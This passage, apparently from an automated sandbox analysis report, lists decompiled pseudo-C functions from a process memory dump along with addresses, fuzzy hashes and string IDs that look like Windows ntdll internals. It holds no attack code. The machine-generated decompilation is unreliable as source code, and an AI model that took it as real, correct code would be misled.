					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01159830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01159990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011595D0();
							goto L11;
						} else {
							_t109 = L01134620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0115F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011595D0();
										L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                      0x0114f0d3
                                                      0x0114f0d9
                                                      0x0114f0e0
                                                      0x0114f0e7
                                                      0x0114f0f2
                                                      0x0114f0f4
                                                      0x0114f0f8
                                                      0x0114f100
                                                      0x0114f108
                                                      0x0114f10d
                                                      0x0114f115
                                                      0x0114f116
                                                      0x0114f11f
                                                      0x0114f123
                                                      0x0114f124
                                                      0x0114f12c
                                                      0x0114f130
                                                      0x0114f134
                                                      0x0114f13d
                                                      0x0114f144
                                                      0x0114f14b
                                                      0x0114f152
                                                      0x0118bab0
                                                      0x0118bab0
                                                      0x0114f158
                                                      0x0114f158
                                                      0x0114f15a
                                                      0x0114f160
                                                      0x0114f165
                                                      0x0114f166
                                                      0x0114f16f
                                                      0x0114f173
                                                      0x0118baa7
                                                      0x0118baa7
                                                      0x0118baab
                                                      0x00000000
                                                      0x0114f179
                                                      0x0114f18d
                                                      0x0114f191
                                                      0x0118baa2
                                                      0x00000000
                                                      0x0114f197
                                                      0x0114f19b
                                                      0x0114f1a2
                                                      0x0114f1a9
                                                      0x0114f1af
                                                      0x0114f1b2
                                                      0x0114f1b6
                                                      0x0114f1b9
                                                      0x0114f1c4
                                                      0x0114f1d8
                                                      0x0114f1df
                                                      0x0114f1e3
                                                      0x0114f1eb
                                                      0x0114f1ee
                                                      0x0114f1f4
                                                      0x0114f20f
                                                      0x0118bab7
                                                      0x0118babb
                                                      0x0118bacc
                                                      0x0118bad1
                                                      0x0114f215
                                                      0x0114f218
                                                      0x0114f226
                                                      0x0114f22b
                                                      0x00000000
                                                      0x0114f22b
                                                      0x0114f1f6
                                                      0x0114f1f6
                                                      0x0114f1f9
                                                      0x0114f1fb
                                                      0x0114f1fb
                                                      0x0114f1f4
                                                      0x0114f191
                                                      0x0114f173
                                                      0x0114f152
                                                      0x0114f203

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: d020d53d606461bd2dae72de4d9167619b733667b3f26cb78c4ab6f060eba79d
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: CE519E711047159FC325DF18C840A6BBBF4FF98B14F00892EFA9597690E774E915CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01193540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E01193540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x120d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01150BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01193706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0115FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01193540;
						E0115FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0116DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E011A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E011597C0();
					}
					return E0115B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01193971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01193884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0115FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01159650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01193787(_a4,  &_v352, _t80);
						}
					}
					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E011595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                      0x01193552
                                                      0x0119355a
                                                      0x0119355d
                                                      0x01193566
                                                      0x01193567
                                                      0x0119357e
                                                      0x0119358f
                                                      0x011935a1
                                                      0x011935a5
                                                      0x0119366b
                                                      0x0119366b
                                                      0x0119366d
                                                      0x01193672
                                                      0x01193679
                                                      0x01193685
                                                      0x0119368d
                                                      0x0119369d
                                                      0x011936a7
                                                      0x011936b8
                                                      0x011936c6
                                                      0x011936c7
                                                      0x011936dc
                                                      0x011936e1
                                                      0x011936e7
                                                      0x011936e9
                                                      0x011936e9
                                                      0x01193703
                                                      0x01193703
                                                      0x011935b5
                                                      0x011935c0
                                                      0x011935c4
                                                      0x00000000
                                                      0x00000000
                                                      0x011935ca
                                                      0x011935d7
                                                      0x011935e2
                                                      0x011935e6
                                                      0x011935e8
                                                      0x011935f5
                                                      0x011935fa
                                                      0x01193603
                                                      0x01193604
                                                      0x01193609
                                                      0x0119360a
                                                      0x01193612
                                                      0x01193613
                                                      0x0119361e
                                                      0x01193622
                                                      0x01193628
                                                      0x0119362f
                                                      0x0119362f
                                                      0x01193636
                                                      0x01193638
                                                      0x0119363b
                                                      0x01193642
                                                      0x01193642
                                                      0x01193636
                                                      0x01193657
                                                      0x01193657
                                                      0x0119365c
                                                      0x01193662
                                                      0x01193669
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: cae522454594f1c1d1bbc6e1d45298a230c3e09dffec833c7527c537dc1780ef
                                                      • Instruction ID: 8b57b7dda46d179c0aa294a7ff3044a1cce4836ae8fd749a88acd4c81c974f1a
                                                      • Opcode Fuzzy Hash: cae522454594f1c1d1bbc6e1d45298a230c3e09dffec833c7527c537dc1780ef
                                                      • Instruction Fuzzy Hash: 194167B1D1052D9BDF25DA60CC84FDEB77CAB44718F0045A5EA29A7240DB309F88CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E011E05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E011E07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01159730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E011DA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E011DA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E011E1293(_t79, _v40, E011E07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01137D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E011D138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                      0x011e05c5
                                                      0x011e05ca
                                                      0x011e05d3
                                                      0x011e06db
                                                      0x011e06db
                                                      0x011e06dd
                                                      0x011e06e3
                                                      0x011e06e3
                                                      0x011e05dd
                                                      0x011e05e7
                                                      0x011e05f6
                                                      0x011e0600
                                                      0x011e0607
                                                      0x011e0610
                                                      0x011e0615
                                                      0x011e061a
                                                      0x011e061c
                                                      0x011e061e
                                                      0x011e0624
                                                      0x011e0625
                                                      0x011e0627
                                                      0x011e0628
                                                      0x011e0631
                                                      0x011e0640
                                                      0x011e064d
                                                      0x011e0654
                                                      0x011e0654
                                                      0x011e0631
                                                      0x011e066d
                                                      0x011e0674
                                                      0x00000000
                                                      0x00000000
                                                      0x011e0692
                                                      0x011e069e
                                                      0x011e06b0
                                                      0x011e06a0
                                                      0x011e06a9
                                                      0x011e06a9
                                                      0x011e06b8
                                                      0x011e06d6
                                                      0x011e06d6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 1bce1e611d414434ef9b6d54b82d5b7ccc63ba0aae7805c49fdf901b82bb3051
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: 5A310632704B46ABE714DE58CC49F977BD9EBC8758F144125FA549B280D7B0E904CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01193884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E01193884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01159650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01134620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01159650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                      0x01193893
                                                      0x01193896
                                                      0x01193899
                                                      0x0119389f
                                                      0x011938a0
                                                      0x011938a4
                                                      0x011938a9
                                                      0x011938ac
                                                      0x011938ad
                                                      0x011938ae
                                                      0x011938af
                                                      0x011938b1
                                                      0x011938b4
                                                      0x011938bb
                                                      0x011938bc
                                                      0x011938bd
                                                      0x011938c4
                                                      0x011938c8
                                                      0x011938ca
                                                      0x011938ca
                                                      0x011938d5
                                                      0x0119393e
                                                      0x01193940
                                                      0x01193942
                                                      0x01193952
                                                      0x01193954
                                                      0x01193961
                                                      0x01193961
                                                      0x01193967
                                                      0x0119396e
                                                      0x0119396e
                                                      0x01193947
                                                      0x0119394c
                                                      0x00000000
                                                      0x0119394c
                                                      0x011938ea
                                                      0x011938ee
                                                      0x011938f8
                                                      0x011938f9
                                                      0x011938ff
                                                      0x01193900
                                                      0x01193902
                                                      0x01193903
                                                      0x0119390b
                                                      0x0119390f
                                                      0x01193950
                                                      0x00000000
                                                      0x01193950
                                                      0x01193915
                                                      0x0119391d
                                                      0x0119391d
                                                      0x01193922
                                                      0x01193926
                                                      0x00000000
                                                      0x01193928
                                                      0x0119392b
                                                      0x0119392b
                                                      0x01193935
                                                      0x01193937
                                                      0x01193937
                                                      0x00000000
                                                      0x01193935
                                                      0x01193926
                                                      0x011938f0
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 4bbefa8d0bc60ea1d2a19a994535de57b859112829ba733a4102a7ac361ffae6
                                                      • Instruction ID: 0898ad24f2a9878ab738268287d3bfd87dde9e7f3145d1e4ad86c55f987ea13f
                                                      • Opcode Fuzzy Hash: 4bbefa8d0bc60ea1d2a19a994535de57b859112829ba733a4102a7ac361ffae6
                                                      • Instruction Fuzzy Hash: 6331D17291051AEFEF19DB68C945EBBBB74FB80B24F014169E934A7290E7309E04C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E0114D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x120d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01134120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0115B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E011598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E011595D0();
					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                      0x0114d29c
                                                      0x0114d2a6
                                                      0x0114d2b1
                                                      0x0114d2b5
                                                      0x0114d2b6
                                                      0x0114d2bc
                                                      0x0114d2bd
                                                      0x0114d2be
                                                      0x0114d2bf
                                                      0x0114d2c2
                                                      0x0114d2c4
                                                      0x0114d2cc
                                                      0x0114d384
                                                      0x0114d34b
                                                      0x0114d34f
                                                      0x0114d350
                                                      0x0114d351
                                                      0x0114d35c
                                                      0x0114d35c
                                                      0x0114d2d6
                                                      0x0114d2da
                                                      0x0114d2e1
                                                      0x0114d361
                                                      0x0114d369
                                                      0x0114d36d
                                                      0x0114d2e3
                                                      0x0114d2e3
                                                      0x0114d2e3
                                                      0x0114d2e5
                                                      0x0114d2ed
                                                      0x0114d2f5
                                                      0x0114d2fa
                                                      0x0114d302
                                                      0x0114d303
                                                      0x0114d30b
                                                      0x0114d30f
                                                      0x0114d313
                                                      0x0114d318
                                                      0x0114d31c
                                                      0x0114d320
                                                      0x0114d379
                                                      0x0114d37d
                                                      0x00000000
                                                      0x00000000
                                                      0x0118affe
                                                      0x0118b001
                                                      0x0118b011
                                                      0x00000000
                                                      0x0114d322
                                                      0x0114d322
                                                      0x0114d330
                                                      0x0114d337
                                                      0x0114d35d
                                                      0x0114d339
                                                      0x0114d33f
                                                      0x0114d38c
                                                      0x0114d38c
                                                      0x0114d33f
                                                      0x0114d349
                                                      0x00000000
                                                      0x0114d349

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 9534e5cfdfa9be052534f9c2daf1f59b59ab344ca7fa7156fdf86090aca5ff1d
                                                      • Instruction ID: 06981370be616a0df1dcc5b8bdd38f6c64e500ac0bead4fb348fe4ff36ccffd9
                                                      • Opcode Fuzzy Hash: 9534e5cfdfa9be052534f9c2daf1f59b59ab344ca7fa7156fdf86090aca5ff1d
                                                      • Instruction Fuzzy Hash: C431AFB550C305DFCB29DF68D88096BBBE8EBA5A58F01092EF99483250D734DD04CB93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01121B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: f8127a0e841552c803dfead5ab2d8930a8fc8b5799f87b762c197f5261adb464
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 1F21F27A500639BBDB2ADA599844FAFBBBDAF81A50F164425FE048B300D730DD20D7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0113F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 2a6f55b8d5c5a14378bfa9eda33093369e08147003764be2fe41deadd479a579
                                                      • Instruction ID: 5d826a87a38fafd38597419c06593e03aba7e72672cf556b7cbe097aef5cd0a2
                                                      • Opcode Fuzzy Hash: 2a6f55b8d5c5a14378bfa9eda33093369e08147003764be2fe41deadd479a579
                                                      • Instruction Fuzzy Hash: 4D11D034F04E438BFB2F4E1D8894B367695ABC5224F26453AE565CB399DB70C8038743
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011C8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Critical error detected %lx, xrefs: 011C8E21
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: afa3af1a2482733270230e34336513c6596a6241cefb8320b2061cdc8f917b8f
                                                      • Instruction ID: 72c84bd5c824c90418171ffac97b5c9e56e6e9179d94b7985753fec2c5e94327
                                                      • Opcode Fuzzy Hash: afa3af1a2482733270230e34336513c6596a6241cefb8320b2061cdc8f917b8f
                                                      • Instruction Fuzzy Hash: 62118771E04348DADF2DCFE999457ACBBB4BB24714F20425EE168AB282C3750602CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011AFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 011AFF60
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: b9f607be537ae29e95a13265c4da924cc83e44214c7cc73d502a040d8969a2d2
                                                      • Instruction ID: d9017f6504f92fe9e2f64747fadf1216737bcac5ce93df7d135a711dbdb03cc2
                                                      • Opcode Fuzzy Hash: b9f607be537ae29e95a13265c4da924cc83e44214c7cc73d502a040d8969a2d2
                                                      • Instruction Fuzzy Hash: 1A11047AA10545EFDF2ADB54C848F9CBFB5FF08708F548044F108671A2C7799951CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E5BA5, Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50ca6573c9de998ec98ca01e898284c3b35c27c5293d650ff2d018708e663c7f
                                                      • Instruction ID: 6f495b5d2c2bd0b074a32ebe8a50d6ee386bbed9ad1feb96ef08acd21dfb77f0
                                                      • Opcode Fuzzy Hash: 50ca6573c9de998ec98ca01e898284c3b35c27c5293d650ff2d018708e663c7f
                                                      • Instruction Fuzzy Hash: BC427B75900629CFDB68CFA8C884BA9BBF1FF55304F1581AAD94DEB242D7309985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01134120, Relevance: .4, Instructions: 444COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57c08c0dd4ba943b65e82e9954236062438b315fe0388aabf5a706a90c011f06
                                                      • Instruction ID: c9b6721a994800a699be50925e4ec802c23a28d02d56dfbb2a3e269e042fa734
                                                      • Opcode Fuzzy Hash: 57c08c0dd4ba943b65e82e9954236062438b315fe0388aabf5a706a90c011f06
                                                      • Instruction Fuzzy Hash: D6F179706082118BD72CCF58C480A7ABBF1EF88714F15896EF986CBB94E734D891CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011420A0, Relevance: .4, Instructions: 420COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b574c37ac999bd905a393ef80d08ee56b6fae51492fba259b26b928e4c07e8b6
                                                      • Instruction ID: 06e4b628ad762351a827b3095c762c2780588b982b4aca90f578f8b849ef345e
                                                      • Opcode Fuzzy Hash: b574c37ac999bd905a393ef80d08ee56b6fae51492fba259b26b928e4c07e8b6
                                                      • Instruction Fuzzy Hash: 8FF1E331A083419FD76EDF2CD840B6BBBE2AF85B24F05851DF9959B281D734D881CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112D5E0, Relevance: .4, Instructions: 353COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17f5ee87ab4b2cfa9aa182539cd90a9d6627d6dd9d65536c38df697b3310b7a9
                                                      • Instruction ID: 29de2bc255e471f1ed73338c8f75e0045b023a22077d0ececbdc2a57da87b43a
                                                      • Opcode Fuzzy Hash: 17f5ee87ab4b2cfa9aa182539cd90a9d6627d6dd9d65536c38df697b3310b7a9
                                                      • Instruction Fuzzy Hash: F6E1D330A0476ACFEF3DCF68D884B69B7B2BF45308F0501A9D90997391D774A991CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112849B, Relevance: .3, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6449cc00c4d258e535b4657be7f731f48f4a50da322fd17b3359334b1c30786a
